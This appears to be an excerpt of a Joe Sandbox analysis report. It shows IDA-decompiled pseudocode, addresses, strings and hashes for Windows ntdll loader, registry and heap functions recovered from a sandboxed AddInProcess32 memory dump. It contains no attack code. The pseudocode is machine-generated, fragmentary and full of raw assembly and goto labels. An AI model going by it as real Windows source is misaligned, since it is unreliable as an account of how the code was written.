						_t125 = 0x13;
						asm("int 0x29");
						_push(0);
						_push(_t159);
						_t161 = _t125;
						_t87 =  *( *[fs:0x30] + 0x1e8);
						_t143 = 0;
						_v40 = _t161;
						_t118 = 0;
						_push(_t153);
						__eflags = _t87;
						if(_t87 != 0) {
							_t118 = _t87 + 0x5d8;
							__eflags = _t118;
							if(_t118 == 0) {
								L46:
								_t118 = 0;
							} else {
								__eflags =  *(_t118 + 0x30);
								if( *(_t118 + 0x30) == 0) {
									goto L46;
								}
							}
						}
						_v32 = 0;
						_v28 = 0;
						_v16 = 0;
						_v20 = 0;
						_v12 = 0;
						__eflags = _t118;
						if(_t118 != 0) {
							__eflags = _t161;
							if(_t161 != 0) {
								__eflags =  *(_t118 + 8);
								if( *(_t118 + 8) == 0) {
									L22:
									_t143 = 1;
									__eflags = 1;
								} else {
									_t19 = _t118 + 0x40; // 0x40
									_t156 = _t19;
									E01868999(_t19,  &_v16);
									__eflags = _v0;
									if(_v0 != 0) {
										__eflags = _v0 - 1;
										if(_v0 != 1) {
											goto L22;
										} else {
											_t128 =  *(_t161 + 0x64);
											__eflags =  *(_t161 + 0x64);
											if( *(_t161 + 0x64) == 0) {
												goto L22;
											} else {
												E01868999(_t128,  &_v12);
												_t147 = _v12;
												_t91 = 0;
												__eflags = 0;
												_t129 =  *_t147;
												while(1) {
													__eflags =  *((intOrPtr*)(0x1945c60 + _t91 * 8)) - _t129;
													if( *((intOrPtr*)(0x1945c60 + _t91 * 8)) == _t129) {
														break;
													}
													_t91 = _t91 + 1;
													__eflags = _t91 - 5;
													if(_t91 < 5) {
														continue;
													} else {
														_t131 = 0;
														__eflags = 0;
													}
													L37:
													__eflags = _t131;
													if(_t131 != 0) {
														goto L22;
													} else {
														__eflags = _v16 - _t147;
														if(_v16 != _t147) {
															goto L22;
														} else {
															E01872280(_t92, 0x19486cc);
															_t94 = E01929DFB( &_v20);
															__eflags = _t94 - 1;
															if(_t94 != 1) {
															}
															asm("movsd");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															 *_t118 =  *_t118 + 1;
															asm("adc dword [ebx+0x4], 0x0");
															_t95 = E018861A0( &_v32);
															__eflags = _t95;
															if(_t95 != 0) {
																__eflags = _v32 | _v28;
																if((_v32 | _v28) != 0) {
																	_t71 = _t118 + 0x40; // 0x3f
																	_t134 = _t71;
																	goto L55;
																}
															}
															goto L30;
														}
													}
													goto L56;
												}
												_t92 = 0x1945c64 + _t91 * 8;
												asm("lock xadd [eax], ecx");
												_t131 = (_t129 | 0xffffffff) - 1;
												goto L37;
											}
										}
										goto L56;
									} else {
										_t143 = E01868A0A( *((intOrPtr*)(_t161 + 0x18)),  &_v12);
										__eflags = _t143;
										if(_t143 != 0) {
											_t157 = _v12;
											_t103 = 0;
											__eflags = 0;
											_t136 =  &(_t157[1]);
											 *(_t161 + 0x64) = _t136;
											_t151 =  *_t157;
											_v20 = _t136;
											while(1) {
												__eflags =  *((intOrPtr*)(0x1945c60 + _t103 * 8)) - _t151;
												if( *((intOrPtr*)(0x1945c60 + _t103 * 8)) == _t151) {
													break;
												}
												_t103 = _t103 + 1;
												__eflags = _t103 - 5;
												if(_t103 < 5) {
													continue;
												}
												L21:
												_t105 = E0189F380(_t136, 0x1831184, 0x10);
												__eflags = _t105;
												if(_t105 != 0) {
													__eflags =  *_t157 -  *_v16;
													if( *_t157 >=  *_v16) {
														goto L22;
													} else {
														asm("cdq");
														_t166 = _t157[5] & 0x0000ffff;
														_t108 = _t157[5] & 0x0000ffff;
														asm("cdq");
														_t168 = _t166 << 0x00000010 | _t157[5] & 0x0000ffff;
														__eflags = ((_t151 << 0x00000020 | _t166) << 0x10 | _t151) -  *((intOrPtr*)(_t118 + 0x2c));
														if(__eflags > 0) {
															L29:
															E01872280(_t108, 0x19486cc);
															 *_t118 =  *_t118 + 1;
															_t42 = _t118 + 0x40; // 0x3f
															_t156 = _t42;
															asm("adc dword [ebx+0x4], 0x0");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															_t110 = E018861A0( &_v32);
															__eflags = _t110;
															if(_t110 != 0) {
																__eflags = _v32 | _v28;
																if((_v32 | _v28) != 0) {
																	_t134 = _v20;
																	L55:
																	E01929D2E(_t134, 1, _v32, _v28,  *(_v24 + 0x24) & 0x0000ffff,  *((intOrPtr*)(_v24 + 0x28)));
																}
															}
															L30:
															 *_t118 =  *_t118 + 1;
															asm("adc dword [ebx+0x4], 0x0");
															E0186FFB0(_t118, _t156, 0x19486cc);
															goto L22;
														} else {
															if(__eflags < 0) {
																goto L22;
															} else {
																__eflags = _t168 -  *((intOrPtr*)(_t118 + 0x28));
																if(_t168 <  *((intOrPtr*)(_t118 + 0x28))) {
																	goto L22;
																} else {
																	goto L29;
																}
															}
														}
													}
													goto L56;
												}
												goto L22;
											}
											asm("lock inc dword [eax]");
											goto L21;
										}
									}
								}
							}
						}
						return _t143;
					}
				} else {
					_push( &_v8);
					_push( *((intOrPtr*)(__ecx + 0x50)));
					_push(__ecx + 0x40);
					_push(_t121);
					_push(0xffffffff);
					_t80 = E01899A00();
					_t159 = _t80;
					if(_t159 < 0) {
						L8:
						return _t80;
					} else {
						goto L2;
					}
				}
				L56:
			}

0x01868799
0x0186879d
0x018687a1
0x018687a3
0x018687a8
0x018687c3
0x018687c3
0x018687c8
0x018687d1
0x018687d4
0x018687d8
0x018687e5
0x018687ec
0x018b9bfe
0x018b9c00
0x018b9c02
0x018b9c08
0x018b9c0d
0x018b9c0f
0x018b9c14
0x018b9c2d
0x018b9c32
0x018b9c37
0x018b9c3a
0x018b9c3c
0x018b9c42
0x018b9c42
0x018b9c3c
0x018b9c02
0x018687da
0x018687df
0x018687e3
0x00000000
0x00000000
0x018687e3
0x018687f2
0x00000000
0x018687fb
0x018687fd
0x018687fe
0x0186880e
0x0186880f
0x01868810
0x01868814
0x0186881a
0x0186881c
0x0186881f
0x01868821
0x01868822
0x01868824
0x01868826
0x0186882c
0x0186882e
0x018b9c48
0x018b9c48
0x01868834
0x01868834
0x01868837
0x00000000
0x00000000
0x01868837
0x0186882e
0x0186883d
0x01868840
0x01868843
0x01868846
0x01868849
0x0186884c
0x0186884e
0x01868850
0x01868852
0x01868854
0x01868857
0x018688b4
0x018688b6
0x018688b6
0x01868859
0x01868859
0x01868859
0x01868861
0x01868866
0x0186886a
0x0186893d
0x01868941
0x00000000
0x01868947
0x01868947
0x0186894a
0x0186894c
0x00000000
0x01868952
0x01868955
0x0186895a
0x0186895d
0x0186895d
0x0186895f
0x01868961
0x01868961
0x01868968
0x00000000
0x00000000
0x0186896a
0x0186896b
0x0186896e
0x00000000
0x01868970
0x01868970
0x01868970
0x01868970
0x01868972
0x01868972
0x01868974
0x00000000
0x0186897a
0x0186897a
0x0186897d
0x00000000
0x01868983
0x018b9c65
0x018b9c6d
0x018b9c72
0x018b9c75
0x018b9c75
0x018b9c82
0x018b9c86
0x018b9c87
0x018b9c88
0x018b9c89
0x018b9c8c
0x018b9c90
0x018b9c95
0x018b9c97
0x018b9ca0
0x018b9ca3
0x018b9ca9
0x018b9ca9
0x00000000
0x018b9ca9
0x018b9ca3
0x00000000
0x018b9c97
0x0186897d
0x00000000
0x01868974
0x01868988
0x01868992
0x01868996
0x00000000
0x01868996
0x0186894c
0x00000000
0x01868870
0x0186887b
0x0186887d
0x0186887f
0x01868881
0x01868884
0x01868884
0x01868886
0x01868889
0x0186888c
0x0186888e
0x01868891
0x01868891
0x01868898
0x00000000
0x00000000
0x0186889a
0x0186889b
0x0186889e
0x00000000
0x00000000
0x018688a0
0x018688a8
0x018688b0
0x018688b2
0x018688d3
0x018688d5
0x00000000
0x018688d7
0x018688db
0x018688dc
0x018688e0
0x018688e8
0x018688ee
0x018688f0
0x018688f3
0x018688fc
0x01868901
0x01868906
0x0186890c
0x0186890c
0x0186890f
0x01868916
0x01868917
0x01868918
0x01868919
0x0186891a
0x0186891f
0x01868921
0x018b9c52
0x018b9c55
0x018b9c5b
0x018b9cac
0x018b9cc0
0x018b9cc0
0x018b9c55
0x01868927
0x01868927
0x0186892f
0x01868933
0x00000000
0x018688f5
0x018688f5
0x00000000
0x018688f7
0x018688f7
0x018688fa
0x00000000
0x00000000
0x00000000
0x00000000
0x018688fa
0x018688f5
0x018688f3
0x00000000
0x018688d5
0x00000000
0x018688b2
0x018688c9
0x00000000
0x018688c9
0x0186887f
0x0186886a
0x01868857
0x01868852
0x018688bf
0x018688bf
0x018687aa
0x018687ad
0x018687ae
0x018687b4
0x018687b5
0x018687b6
0x018687b8
0x018687bd
0x018687c1
0x018687f4
0x018687fa
0x00000000
0x00000000
0x00000000
0x018687c1
0x00000000

Strings

minkernel\ntdll\ldrsnap.c, xrefs: 018B9C28
LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x, xrefs: 018B9C18
LdrpDoPostSnapWork, xrefs: 018B9C1E

Memory Dump Source

Source File: 00000011.00000002.429111171.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: true

Associated: 00000011.00000002.430801201.000000000194B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.430831946.000000000194F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_1830000_AddInProcess32.jbxd

Similarity

API ID: InitializeThunk
String ID: LdrpDoPostSnapWork$LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x$minkernel\ntdll\ldrsnap.c
API String ID: 2994545307-1948996284
Opcode ID: 9fc9d1321af9fa12ec487c8ae2eb2592e9d77f7c3c48f821cca36f37f60abb9f
Instruction ID: d825c5712a97547b92a7ffe27c3da0dd86f2d2282ad16b514f24cbfe52b450b3
Opcode Fuzzy Hash: 9fc9d1321af9fa12ec487c8ae2eb2592e9d77f7c3c48f821cca36f37f60abb9f
Instruction Fuzzy Hash: 1391E171A0031A9FEF28DF5DD4C1AAAB7B9FF86314B154169DA09EB241D730EB01CB91

Uniqueness

Uniqueness Score: -1.00%

Function 01867E41 Relevance: 3.9, Strings: 3, Instructions: 174
COMMON

Download Yara Rule

C-Code - Quality: 98%

			E01867E41(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				char _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				char _v24;
				signed int _t73;
				void* _t77;
				char* _t82;
				char* _t87;
				signed char* _t97;
				signed char _t102;
				intOrPtr _t107;
				signed char* _t108;
				intOrPtr _t112;
				intOrPtr _t124;
				intOrPtr _t125;
				intOrPtr _t126;

				_t107 = __edx;
				_v12 = __ecx;
				_t125 =  *((intOrPtr*)(__ecx + 0x20));
				_t124 = 0;
				_v20 = __edx;
				if(E0186CEE4( *((intOrPtr*)(_t125 + 0x18)), 1, 0xe,  &_v24,  &_v8) >= 0) {
					_t112 = _v8;
				} else {
					_t112 = 0;
					_v8 = 0;
				}
				if(_t112 != 0) {
					if(( *(_v12 + 0x10) & 0x00800000) != 0) {
						_t124 = 0xc000007b;
						goto L8;
					}
					_t73 =  *(_t125 + 0x34) | 0x00400000;
					 *(_t125 + 0x34) = _t73;
					if(( *(_t112 + 0x10) & 0x00000001) == 0) {
						goto L3;
					}
					 *(_t125 + 0x34) = _t73 | 0x01000000;
					_t124 = E0185C9A4( *((intOrPtr*)(_t125 + 0x18)));
					if(_t124 < 0) {
						goto L8;
					} else {
						goto L3;
					}
				} else {
					L3:
					if(( *(_t107 + 0x16) & 0x00002000) == 0) {
						 *(_t125 + 0x34) =  *(_t125 + 0x34) & 0xfffffffb;
						L8:
						return _t124;
					}
					if(( *( *((intOrPtr*)(_t125 + 0x5c)) + 0x10) & 0x00000080) != 0) {
						if(( *(_t107 + 0x5e) & 0x00000080) != 0) {
							goto L5;
						}
						_t102 =  *0x1945780; // 0x0
						if((_t102 & 0x00000003) != 0) {
							E018D5510("minkernel\\ntdll\\ldrmap.c", 0x363, "LdrpCompleteMapModule", 0, "Could not validate the crypto signature for DLL %wZ\n", _t125 + 0x24);
							_t102 =  *0x1945780; // 0x0
						}
						if((_t102 & 0x00000010) != 0) {
							asm("int3");
						}
						_t124 = 0xc0000428;
						goto L8;
					}
					L5:
					if(( *(_t125 + 0x34) & 0x01000000) != 0) {
						goto L8;
					}
					_t77 = _a4 - 0x40000003;
					if(_t77 == 0 || _t77 == 0x33) {
						_v16 =  *((intOrPtr*)(_t125 + 0x18));
						if(E01877D50() != 0) {
							_t82 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
						} else {
							_t82 = 0x7ffe0384;
						}
						_t108 = 0x7ffe0385;
						if( *_t82 != 0) {
							if(( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
								if(E01877D50() == 0) {
									_t97 = 0x7ffe0385;
								} else {
									_t97 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
								}
								if(( *_t97 & 0x00000020) != 0) {
									E018D7016(0x1490, _v16, 0xffffffff, 0xffffffff, 0, 0);
								}
							}
						}
						if(_a4 != 0x40000003) {
							L14:
							_t126 =  *((intOrPtr*)(_t125 + 0x18));
							if(E01877D50() != 0) {
								_t87 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
							} else {
								_t87 = 0x7ffe0384;
							}
							if( *_t87 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
								if(E01877D50() != 0) {
									_t108 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
								}
								if(( *_t108 & 0x00000020) != 0) {
									E018D7016(0x1491, _t126, 0xffffffff, 0xffffffff, 0, 0);
								}
							}
							goto L8;
						} else {
							_v16 = _t125 + 0x24;
							_t124 = E0188A1C3( *((intOrPtr*)(_t125 + 0x18)),  *((intOrPtr*)(_v12 + 0x5c)), _v20, _t125 + 0x24);
							if(_t124 < 0) {
								E0185B1E1(_t124, 0x1490, 0, _v16);
								goto L8;
							}
							goto L14;
						}
					} else {
						goto L8;
					}
				}
			}

0x01867e4c
0x01867e50
0x01867e55
0x01867e58
0x01867e5d
0x01867e71
0x01867f33
0x01867e77
0x01867e77
0x01867e79
0x01867e79
0x01867e7e
0x01867f45
0x018b9848
0x00000000
0x018b9848
0x01867f4e
0x01867f53
0x01867f5a
0x00000000
0x00000000
0x018b985a
0x018b9862
0x018b9866
0x00000000
0x018b986c
0x00000000
0x018b986c
0x01867e84
0x01867e84
0x01867e8d
0x018b9871
0x01867eb8
0x01867ec0
0x01867ec0
0x01867e9a
0x018b987e
0x00000000
0x00000000
0x018b9884
0x018b988b
0x018b98a7
0x018b98ac
0x018b98b1
0x018b98b6
0x018b98b8
0x018b98b8
0x018b98b9
0x00000000
0x018b98b9
0x01867ea0
0x01867ea7
0x00000000
0x00000000
0x01867eac
0x01867eb1
0x01867ec6
0x01867ed0
0x018b98cc
0x01867ed6
0x01867ed6
0x01867ed6
0x01867ede
0x01867ee3
0x018b98e3
0x018b98f0
0x018b9902
0x018b98f2
0x018b98fb
0x018b98fb
0x018b9907
0x018b991d
0x018b991d
0x018b9907
0x018b98e3
0x01867ef0
0x01867f14
0x01867f14
0x01867f1e
0x018b9946
0x01867f24
0x01867f24
0x01867f24
0x01867f2c
0x018b996a
0x018b9975
0x018b9975
0x018b997e
0x018b9993
0x018b9993
0x018b997e
0x00000000
0x01867ef2
0x01867efc
0x01867f0a
0x01867f0e
0x018b9933
0x00000000
0x018b9933
0x00000000
0x01867f0e
0x00000000
0x00000000
0x00000000
0x01867eb1

Strings

LdrpCompleteMapModule, xrefs: 018B9898
minkernel\ntdll\ldrmap.c, xrefs: 018B98A2
Could not validate the crypto signature for DLL %wZ, xrefs: 018B9891

Memory Dump Source

Source File: 00000011.00000002.429111171.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: true

Associated: 00000011.00000002.430801201.000000000194B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.430831946.000000000194F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_1830000_AddInProcess32.jbxd

Similarity

API ID:
String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$minkernel\ntdll\ldrmap.c
API String ID: 0-1676968949
Opcode ID: ddc88061dd6c077ab74138e5d9ba6ad6b7ce9543869a6df9c469f2c510fed3f8
Instruction ID: ce378370fa2a4bc56e8fa312be9420896be72d6cc8dc8787f836a91fe6b34e8e
Opcode Fuzzy Hash: ddc88061dd6c077ab74138e5d9ba6ad6b7ce9543869a6df9c469f2c510fed3f8
Instruction Fuzzy Hash: 4A51E171A04746DBE722CB6CCD84B6A7BA8AB00B1CF0405A9EA51DB3D1D734EF04C791

Uniqueness

Uniqueness Score: -1.00%

Function 0185E620 Relevance: 3.9, Strings: 3, Instructions: 165
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E0185E620(void* __ecx, short* __edx, short* _a4) {
				char _v16;
				char _v20;
				intOrPtr _v24;
				char* _v28;
				char _v32;
				char _v36;
				char _v44;
				signed int _v48;
				intOrPtr _v52;
				void* _v56;
				void* _v60;
				char _v64;
				void* _v68;
				void* _v76;
				void* _v84;
				signed int _t59;
				signed int _t74;
				signed short* _t75;
				signed int _t76;
				signed short* _t78;
				signed int _t83;
				short* _t93;
				signed short* _t94;
				short* _t96;
				void* _t97;
				signed int _t99;
				void* _t101;
				void* _t102;

				_t80 = __ecx;
				_t101 = (_t99 & 0xfffffff8) - 0x34;
				_t96 = __edx;
				_v44 = __edx;
				_t78 = 0;
				_v56 = 0;
				if(__ecx == 0 || __edx == 0) {
					L28:
					_t97 = 0xc000000d;
				} else {
					_t93 = _a4;
					if(_t93 == 0) {
						goto L28;
					}
					_t78 = E0185F358(__ecx, 0xac);
					if(_t78 == 0) {
						_t97 = 0xc0000017;
						L6:
						if(_v56 != 0) {
							_push(_v56);
							E018995D0();
						}
						if(_t78 != 0) {
							L018777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t78);
						}
						return _t97;
					}
					E0189FA60(_t78, 0, 0x158);
					_v48 = _v48 & 0x00000000;
					_t102 = _t101 + 0xc;
					 *_t96 = 0;
					 *_t93 = 0;
					E0189BB40(_t80,  &_v36, L"\\Registry\\Machine\\System\\CurrentControlSet\\Control\\NLS\\Language");
					_v36 = 0x18;
					_v28 =  &_v44;
					_v64 = 0;
					_push( &_v36);
					_push(0x20019);
					_v32 = 0;
					_push( &_v64);
					_v24 = 0x40;
					_v20 = 0;
					_v16 = 0;
					_t97 = E01899600();
					if(_t97 < 0) {
						goto L6;
					}
					E0189BB40(0,  &_v36, L"InstallLanguageFallback");
					_push(0);
					_v48 = 4;
					_t97 = L0185F018(_v64,  &_v44,  &_v56, _t78,  &_v48);
					if(_t97 >= 0) {
						if(_v52 != 1) {
							L17:
							_t97 = 0xc0000001;
							goto L6;
						}
						_t59 =  *_t78 & 0x0000ffff;
						_t94 = _t78;
						_t83 = _t59;
						if(_t59 == 0) {
							L19:
							if(_t83 == 0) {
								L23:
								E0189BB40(_t83, _t102 + 0x24, _t78);
								if(L018643C0( &_v48,  &_v64) == 0) {
									goto L17;
								}
								_t84 = _v48;
								 *_v48 = _v56;
								if( *_t94 != 0) {
									E0189BB40(_t84, _t102 + 0x24, _t94);
									if(L018643C0( &_v48,  &_v64) != 0) {
										 *_a4 = _v56;
									} else {
										_t97 = 0xc0000001;
										 *_v48 = 0;
									}
								}
								goto L6;
							}
							_t83 = _t83 & 0x0000ffff;
							while(_t83 == 0x20) {
								_t94 =  &(_t94[1]);
								_t74 =  *_t94 & 0x0000ffff;
								_t83 = _t74;
								if(_t74 != 0) {
									continue;
								}
								goto L23;
							}
							goto L23;
						} else {
							goto L14;
						}
						while(1) {
							L14:
							_t27 =  &(_t94[1]); // 0x2
							_t75 = _t27;
							if(_t83 == 0x2c) {
								break;
							}
							_t94 = _t75;
							_t76 =  *_t94 & 0x0000ffff;
							_t83 = _t76;
							if(_t76 != 0) {
								continue;
							}
							goto L23;
						}
						 *_t94 = 0;
						_t94 = _t75;
						_t83 =  *_t75 & 0x0000ffff;
						goto L19;
					}
				}
			}

0x0185e620
0x0185e628
0x0185e62f
0x0185e631
0x0185e635
0x0185e637
0x0185e63e
0x018b5503
0x018b5503
0x0185e64c
0x0185e64c
0x0185e651
0x00000000
0x00000000
0x0185e661
0x0185e665
0x018b542a
0x0185e715
0x0185e71a
0x0185e71c
0x0185e720
0x0185e720
0x0185e727
0x0185e736
0x0185e736
0x0185e743
0x0185e743
0x0185e673
0x0185e678
0x0185e67d
0x0185e682
0x0185e685
0x0185e692
0x0185e69b
0x0185e6a3
0x0185e6ad
0x0185e6b1
0x0185e6b2
0x0185e6bb
0x0185e6bf
0x0185e6c0
0x0185e6c8
0x0185e6cc
0x0185e6d5
0x0185e6d9
0x00000000
0x00000000
0x0185e6e5
0x0185e6ea
0x0185e6f9
0x0185e70b
0x0185e70f
0x018b5439
0x018b545e
0x018b545e
0x00000000
0x018b545e
0x018b543b
0x018b543e
0x018b5440
0x018b5445
0x018b5472
0x018b5475
0x018b548d
0x018b5493
0x018b54a9
0x00000000
0x00000000
0x018b54ab
0x018b54b4
0x018b54bc
0x018b54c8
0x018b54de
0x018b54fb
0x018b54e0
0x018b54e6
0x018b54eb
0x018b54eb
0x018b54de
0x00000000
0x018b54bc
0x018b5477
0x018b547a
0x018b5480
0x018b5483
0x018b5486
0x018b548b
0x00000000
0x00000000
0x00000000
0x018b548b
0x00000000
0x00000000
0x00000000
0x00000000
0x018b5447
0x018b5447
0x018b5447
0x018b5447
0x018b544e
0x00000000
0x00000000
0x018b5450
0x018b5452
0x018b5455
0x018b545a
0x00000000
0x00000000
0x00000000
0x018b545c
0x018b546a
0x018b546d
0x018b546f
0x00000000
0x018b546f
0x0185e70f

Strings

@, xrefs: 0185E6C0
\Registry\Machine\System\CurrentControlSet\Control\NLS\Language, xrefs: 0185E68C
InstallLanguageFallback, xrefs: 0185E6DB

Memory Dump Source

Source File: 00000011.00000002.429111171.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: true

Associated: 00000011.00000002.430801201.000000000194B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.430831946.000000000194F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_1830000_AddInProcess32.jbxd

Similarity

API ID:
String ID: @$InstallLanguageFallback$\Registry\Machine\System\CurrentControlSet\Control\NLS\Language
API String ID: 0-1757540487
Opcode ID: 6a53c322fcd6c412abe15dcbf430cc8270dc04fff5dc11bbedfbceb51a48a9ab
Instruction ID: 574d6e985e5c0fcc3e74d30d28bd3583d535941755f25237b8cb3da4a885f474
Opcode Fuzzy Hash: 6a53c322fcd6c412abe15dcbf430cc8270dc04fff5dc11bbedfbceb51a48a9ab
Instruction Fuzzy Hash: D7516FB25043469BDB15DF68C880AABB7E8EF88755F05092EF985D7250E734DB04C7A2

Uniqueness

Uniqueness Score: -1.00%

Function 018EFF10 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 44timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 018EFF9A

Strings

NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p, xrefs: 018EFF60

Memory Dump Source

Source File: 00000011.00000002.429111171.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: true

Associated: 00000011.00000002.430801201.000000000194B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.430831946.000000000194F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_1830000_AddInProcess32.jbxd

Similarity

API ID: DebugPrintTimes
String ID: NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p
API String ID: 3446177414-1911121157
Opcode ID: d20345f98a82d03e3ef3ee28060233936361b9b5ce6df9d1ad935939d68ee3d1
Instruction ID: 51a23791c6aaf7c9966083425a10c12db5c1023871d6a9fa7870fc52ae24f5fa
Opcode Fuzzy Hash: d20345f98a82d03e3ef3ee28060233936361b9b5ce6df9d1ad935939d68ee3d1
Instruction Fuzzy Hash: A511E175950548EFEB26EB98C848F98BBF1BB09704F548054E208E76A1CB389A40CB91

Uniqueness

Uniqueness Score: -1.00%

Function 0191E539 Relevance: 2.8, Strings: 2, Instructions: 261
COMMON

Download Yara Rule

C-Code - Quality: 60%

			E0191E539(unsigned int* __ecx, intOrPtr __edx, signed int _a4, signed int _a8) {
				signed int _v20;
				char _v24;
				signed int _v40;
				char _v44;
				intOrPtr _v48;
				signed int _v52;
				unsigned int _v56;
				char _v60;
				signed int _v64;
				char _v68;
				signed int _v72;
				void* __ebx;
				void* __edi;
				char _t87;
				signed int _t90;
				signed int _t94;
				signed int _t100;
				intOrPtr* _t113;
				signed int _t122;
				void* _t132;
				void* _t135;
				signed int _t139;
				signed int* _t141;
				signed int _t146;
				signed int _t147;
				void* _t153;
				signed int _t155;
				signed int _t159;
				char _t166;
				void* _t172;
				void* _t176;
				signed int _t177;
				intOrPtr* _t179;

				_t179 = __ecx;
				_v48 = __edx;
				_v68 = 0;
				_v72 = 0;
				_push(__ecx[1]);
				_push( *__ecx);
				_push(0);
				_t153 = 0x14;
				_t135 = _t153;
				_t132 = E0191BBBB(_t135, _t153);
				if(_t132 == 0) {
					_t166 = _v68;
					goto L43;
				} else {
					_t155 = 0;
					_v52 = 0;
					asm("stosd");
					asm("stosd");
					asm("stosd");
					asm("stosd");
					asm("stosd");
					_v56 = __ecx[1];
					if( *__ecx >> 8 < 2) {
						_t155 = 1;
						_v52 = 1;
					}
					_t139 = _a4;
					_t87 = (_t155 << 0xc) + _t139;
					_v60 = _t87;
					if(_t87 < _t139) {
						L11:
						_t166 = _v68;
						L12:
						if(_t132 != 0) {
							E0191BCD2(_t132,  *_t179,  *((intOrPtr*)(_t179 + 4)));
						}
						L43:
						if(_v72 != 0) {
							_push( *((intOrPtr*)(_t179 + 4)));
							_push( *_t179);
							_push(0x8000);
							E0191AFDE( &_v72,  &_v60);
						}
						L46:
						return _t166;
					}
					_t90 =  *(_t179 + 0xc) & 0x40000000;
					asm("sbb edi, edi");
					_t172 = ( ~_t90 & 0x0000003c) + 4;
					if(_t90 != 0) {
						_push(0);
						_push(0x14);
						_push( &_v44);
						_push(3);
						_push(_t179);
						_push(0xffffffff);
						if(E01899730() < 0 || (_v40 & 0x00000060) == 0 || _v44 != _t179) {
							_push(_t139);
							E0191A80D(_t179, 1, _v40, 0);
							_t172 = 4;
						}
					}
					_t141 =  &_v72;
					if(E0191A854(_t141,  &_v60, 0, 0x2000, _t172, _t179,  *_t179,  *((intOrPtr*)(_t179 + 4))) >= 0) {
						_v64 = _a4;
						_t94 =  *(_t179 + 0xc) & 0x40000000;
						asm("sbb edi, edi");
						_t176 = ( ~_t94 & 0x0000003c) + 4;
						if(_t94 != 0) {
							_push(0);
							_push(0x14);
							_push( &_v24);
							_push(3);
							_push(_t179);
							_push(0xffffffff);
							if(E01899730() < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t179) {
								_push(_t141);
								E0191A80D(_t179, 1, _v20, 0);
								_t176 = 4;
							}
						}
						if(E0191A854( &_v72,  &_v64, 0, 0x1000, _t176, 0,  *_t179,  *((intOrPtr*)(_t179 + 4))) < 0) {
							goto L11;
						} else {
							_t177 = _v64;
							 *((intOrPtr*)(_t132 + 0xc)) = _v72;
							_t100 = _v52 + _v52;
							_t146 =  *(_t132 + 0x10) & 0x00000ffd | _t177 & 0xfffff000 | _t100;
							 *(_t132 + 0x10) = _t146;
							asm("bsf eax, [esp+0x18]");
							_v52 = _t100;
							 *(_t132 + 0x10) = (_t100 << 0x00000002 ^ _t146) & 0x000000fc ^ _t146;
							 *((short*)(_t132 + 0xc)) = _t177 - _v48;
							_t47 =  &_a8;
							 *_t47 = _a8 & 0x00000001;
							if( *_t47 == 0) {
								E01872280(_t179 + 0x30, _t179 + 0x30);
							}
							_t147 =  *(_t179 + 0x34);
							_t159 =  *(_t179 + 0x38) & 1;
							_v68 = 0;
							if(_t147 == 0) {
								L35:
								E0186B090(_t179 + 0x34, _t147, _v68, _t132);
								if(_a8 == 0) {
									E0186FFB0(_t132, _t177, _t179 + 0x30);
								}
								asm("lock xadd [eax], ecx");
								asm("lock xadd [eax], edx");
								_t132 = 0;
								_v72 = _v72 & 0;
								_v68 = _v72;
								if(E01877D50() == 0) {
									_t113 = 0x7ffe0388;
								} else {
									_t177 = _v64;
									_t113 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
								}
								if( *_t113 == _t132) {
									_t166 = _v68;
									goto L46;
								} else {
									_t166 = _v68;
									E0190FEC0(_t132, _t179, _t166, _t177 + 0x1000);
									goto L12;
								}
							} else {
								L23:
								while(1) {
									if(_v72 < ( *(_t147 + 0xc) & 0xffff0000)) {
										_t122 =  *_t147;
										if(_t159 == 0) {
											L32:
											if(_t122 == 0) {
												L34:
												_v68 = 0;
												goto L35;
											}
											L33:
											_t147 = _t122;
											continue;
										}
										if(_t122 == 0) {
											goto L34;
										}
										_t122 = _t122 ^ _t147;
										goto L32;
									}
									_t122 =  *(_t147 + 4);
									if(_t159 == 0) {
										L27:
										if(_t122 != 0) {
											goto L33;
										}
										L28:
										_v68 = 1;
										goto L35;
									}
									if(_t122 == 0) {
										goto L28;
									}
									_t122 = _t122 ^ _t147;
									goto L27;
								}
							}
						}
					}
					_v72 = _v72 & 0x00000000;
					goto L11;
				}
			}

0x0191e547
